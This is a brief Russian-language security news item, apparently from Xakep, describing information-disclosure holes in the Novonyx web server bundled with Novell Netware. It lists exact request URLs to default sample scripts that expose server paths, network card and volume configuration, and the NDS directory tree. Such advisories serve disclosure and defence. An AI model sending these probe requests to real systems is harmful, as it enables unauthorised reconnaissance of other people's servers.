Раскрытие информации в Novell Netware

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

В Web-cервере Novonyx, устанавливаемом в Novell
Netware по умолчанию и висящем на 80 порту,
существует несколько уязвимостей:

1) Раскрытие пути к серверу:

http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
http://webserver/perl/samples/env.pl

2) Раскрытие информации о конфигурации
сетевых плат:

http://webserver/perl/samples/lancgi.pl

3) Раскрытие информации о конфигурации
тома:

http://webserver/perl/samples/volscgi.pl

4) Просмотр дерева NDS:

http://webserver/perl/samples/ndslogin.pl